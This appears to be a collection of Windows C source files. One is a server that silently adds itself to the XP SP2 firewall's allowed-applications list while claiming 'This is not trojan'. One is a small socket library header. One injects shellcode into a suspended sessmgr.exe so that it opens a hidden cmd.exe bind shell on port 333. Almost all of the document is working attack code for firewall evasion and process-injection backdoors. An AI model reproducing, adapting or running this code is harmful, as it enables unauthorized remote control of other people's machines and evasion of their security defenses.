#include <stdio.h>
#include <windows.h>
#include <ezsocket.h>
#include <conio.h>
#include "Shlwapi.h"

int main( int argc, char *argv [] )
    {
    char buffer[1024];
    char filename[1024];

    HKEY hKey;
    int i;

    GetModuleFileName(NULL, filename, 1024);

    strcpy(buffer, filename);
    strcat(buffer, ":*:Enabled:");
    strcat(buffer, "bugg");

    RegOpenKeyEx(

       HKEY_LOCAL_MACHINE,
       "SYSTEM\\CurrentControlSet\\Services" "\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile" "\\AuthorizedApplications\\List",
       0,
       KEY_ALL_ACCESS,
       &hKey);

    RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));
   
    int temp, sockfd, new_fd, fd_size;
    struct sockaddr_in remote_addr;

    fprintf(stdout, "Simple server example with Anti SP2 firewall trick \n");
    fprintf(stdout, " This is not trojan \n");
    fprintf(stdout, " Opened port is :2001 \n");
    fprintf(stdout, "author:Mark Kica student of Technical University Kosice\n");
    fprintf(stdout, "Dedicated to Katka H. from Levoca \n");

    sleep(3);

    if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
        return 0;
       

    for (; ; )
        {
        RegDeleteValue(hKey, filename);
          fd_size = sizeof(struct sockaddr_in);

        if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
            {
            perror("accept");
            continue;
            }
        temp = send(new_fd, "Hello World\r\n", strlen("Hello World\r\n"), 0);
        fprintf(stdout, "Sended: Hello World\r\n");
        temp = recv(new_fd, buffer, 1024, 0);
        buffer[temp] = '\0';
        fprintf(stdout, "Recieved: %s\r\n", buffer);
        ezclose_socket(new_fd);
        RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

        if (!strcmp(buffer, "quit"))
            break;
        }

    ezsocket_exit();
   return 0;
    }

/*
   +---------------------------------------------------------+
   | EzSocket library - version 0.0.1                        |
   | (C) 2001, Locrian <locrian@freemail.gr>                 |
   +---------------------------------------------------------+

    This library is free software; you can redistribute it and/or
    modify it under the terms of the GNU Lesser General Public
    License as published by the Free Software Foundation; either
    version 2.1 of the License, or (at your option) any later version.

    This library is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
    Lesser General Public License for more details.

    You should have received a copy of the GNU Lesser General Public
    License along with this library; if not, write to the Free Software
    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
*/

#ifndef _LIBEZSOCKET
#define _LIBEZSOCKET

#include <stdio.h>
#ifdef unix
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/wait.h>
#include <netdb.h>
#define SOCKET int
#else
#include <windows.h>
#endif

#define EZSOCKET_VER "0.0.1"

/****** STREAM SOCKET FUNCTIONS *************************/
#define SERVER 1
#define CLIENT 2
int ezsocket_init(void);
void ezsocket_exit(void);
SOCKET ezsocket(struct sockaddr_in *addr, char *URL, int PORT, int mode);
void ezclose_socket(SOCKET s);
/********* END OF STREAM SOCKET FUNCTIONS ********/



/********* TIME FUNCTIONS ********/
char *ezdate(const char *format);

/*
format variable can be:
A = Date name
B = Month name
d = Day of the month (01-31)
H = Hour(24) (00-23)
I = Hour(12) (01-12)
M = Minuets (00-59)
m = Month (01-12)
p = "AM" or "PM"
S = Seconds (00-61)
Y = Year (4 digits) (e.x. 2001)
y = Year (2 digits) (e.x. 01)
Z = TimeZone
Example: "%d/%m/%Y - %H:%M:%S\n"

*/
/********* END OF TIME FUNCTIONS ********/
#endif

#include <windows.h>
#include <winsock.h>
#include <stdlib.h>
#include <stdio.h>
#include <winsock.h>

void setfp(char *buffer,int sz,DWORD from,DWORD fp)
{
int i;
for(i=0;i<sz-5;i++)
if (buffer[i]=='\xb8'&&*(DWORD*)(buffer+i+1)==from)
{*(DWORD*)(buffer+i+1)=fp;break;}
}

int injcode(char *buffer)
{
HMODULE ws2_32;
DWORD _loadlibrarya,_createprocessa,_wsastartup,_wsasocketa,_bind,_listen,_accept,_sleep;
char *code;
int len;
ws2_32=LoadLibrary("ws2_32");
_loadlibrarya=(DWORD)GetProcAddress(GetModuleHandle("kernel32"),"LoadLibraryA");
_createprocessa=(DWORD)GetProcAddress(GetModuleHandle("kernel32"),"CreateProcessA");
_sleep=(DWORD)GetProcAddress(GetModuleHandle("kernel32"),"Sleep");
_wsastartup=(DWORD)GetProcAddress(ws2_32,"WSAStartup");
_wsasocketa=(DWORD)GetProcAddress(ws2_32,"WSASocketA");
_bind=(DWORD)GetProcAddress(ws2_32,"bind");
_listen=(DWORD)GetProcAddress(ws2_32,"listen");
_accept=(DWORD)GetProcAddress(ws2_32,"accept");

__asm
{
call over

push '23'
push '_2sw'
push esp
mov eax,0x11111111
call eax

xor ebx,ebx
push 0x64
pop ecx
wsadata:
push ebx
loop wsadata
push esp
push 0x101
mov eax,0x33333333
call eax

push ebx
push ebx
push ebx
push ebx
push SOCK_STREAM
push AF_INET
mov eax,0x44444444
call eax
mov esi,eax

push ebx
push ebx
push ebx
push 0x4D010002 /*port 333*/
mov eax,esp
push 0x10
push eax
push esi
mov eax,0x55555555
call eax

push SOMAXCONN
push esi
mov eax,0x66666666
call eax

push ebx
push ebx
push esi
mov eax,0x77777777
call eax
mov edi,eax

push ebx
push ebx
push ebx
push ebx
mov eax,esp
push edi
push edi
push edi
push ebx
push SW_HIDE
push STARTF_USESTDHANDLES
push 0xA
pop ecx
startupinfo:
push ebx
loop startupinfo
push 0x44
mov ecx,esp
push 'dmc'
mov edx, esp

push eax
push ecx
push ebx
push ebx
push ebx
push 1
push ebx
push ebx
push edx
push ebx
mov eax,0x22222222
call eax

push INFINITE
mov eax,0x88888888
call eax

over:
pop eax
mov code,eax
}

len=0xA0;
memcpy(buffer,code,len);
setfp(buffer,len,0x11111111,_loadlibrarya);
setfp(buffer,len,0x22222222,_createprocessa);
setfp(buffer,len,0x33333333,_wsastartup);
setfp(buffer,len,0x44444444,_wsasocketa);
setfp(buffer,len,0x55555555,_bind);
setfp(buffer,len,0x66666666,_listen);
setfp(buffer,len,0x77777777,_accept);
setfp(buffer,len,0x88888888,_sleep);

return len;
}

void main(void)
{
STARTUPINFO sinfo;
PROCESS_INFORMATION pinfo;
CONTEXT context;
LDT_ENTRY sel;
DWORD read,tib,peb,exebase,peoffs,ep;
IMAGE_NT_HEADERS pehdr;
int len;
char sessmgr[MAX_PATH+13];
char buffer[2048];

GetSystemDirectory(sessmgr,MAX_PATH);
sessmgr[MAX_PATH]=0;
strcat(sessmgr,"\\sessmgr.exe");
memset(&sinfo,0,sizeof(sinfo));
sinfo.cb=sizeof(sinfo);

if (!CreateProcess(sessmgr,NULL,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&sinfo,&pinfo))
printf("createprocess failed"), exit(1);

context.ContextFlags=CONTEXT_FULL;
GetThreadContext(pinfo.hThread,&context);
GetThreadSelectorEntry(pinfo.hThread,context.SegFs,&sel);
tib=sel.BaseLow|(sel.HighWord.Bytes.BaseMid<<16)|(sel.HighWord.Bytes.BaseHi<<24);
ReadProcessMemory(pinfo.hProcess,(LPCVOID)(tib+0x30),&peb,4,&read);
ReadProcessMemory(pinfo.hProcess,(LPCVOID)(peb+0x08),&exebase,4,&read);

ReadProcessMemory(pinfo.hProcess,(LPCVOID)(exebase+0x3C),&peoffs,4,&read);
ReadProcessMemory(pinfo.hProcess,(LPCVOID)(exebase+peoffs),&pehdr,sizeof(pehdr),&read);
ep=exebase+pehdr.OptionalHeader.AddressOfEntryPoint;

len=injcode(buffer);
VirtualProtect((LPVOID)ep,len,PAGE_EXECUTE_READWRITE,&read);
WriteProcessMemory(pinfo.hProcess,(LPVOID)ep,buffer,len,&read);

ResumeThread(pinfo.hThread);
}